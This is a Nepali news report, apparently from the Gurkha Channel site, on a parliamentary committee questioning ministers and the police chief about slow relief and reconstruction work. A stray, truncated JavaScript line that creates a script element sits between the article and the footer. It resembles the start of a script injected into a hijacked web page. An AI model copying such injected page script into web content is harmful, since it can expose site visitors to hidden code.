मानबअधिकार समिति

admin Avatar

व्यवस्थापिका संसद अन्तर्गतको सामाजिक न्याय तथा मानबअधिकार समितिले राहत तथा पुननिर्माणका बिषयमा भईरहेको कामका बिषयमा सरकारसंग जानकारी लिएको छ। सिंहदरबारमा बिहीबार बसेको समिति बैठकले राहत तथा पुननिर्माणका बिषयमा उपप्रधानमन्त्री तथा गृहमन्त्री बामदेव गौतमसंग जानकारी लिएको हो। समिति सदस्यहरुले राहत बितरण प्रभावकारी नभएको र पुननिर्माणको कार्य पनि प्रभावकारी नभएको गुनासो गरेपछि समितिले जानकारी लिएको हो। समिति बैठकमा उपस्थीत हुनुभएका मन्त्री गौतमले प्रभारम्भीक चरणमा सवै प्रभावितहरुलाई १५ हजार रुपैया दिएको बताउनुभयो। उहाले खाधान्न अभाव भएका स्थानमा पनि खाद्यान्न सामागं्री बितरण गरिएको भन्दै खाद्यान्न अभाव हुन नदिन भण्डारण पनि गरिएको बताउनुभयो।

त्यस्तै नेपाल प्रहरी प्रमुख उपन्द्र कान्त अर्यालले उद्धारको काम सम्पन्न गरिसकेको भन्दै मृत्यु भएकाको शव हकवालाको जिम्मा लाउने कार्य गरिरहेको बताउनुभयो। उहाले पहिचान हुन नसकेका शवको पहिचान गर्दे वेपत्ताको संख्या घटाउदै लगिएको जानकारी लिनुभयो। छलफलपछि समितिले राहत र पुननिर्माणका साथै पुर्नस्थापनाको कार्यलाइ पनि तिव्र गतिमा अघि बढाउन सरकारलाई निर्देश गरेको छ।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories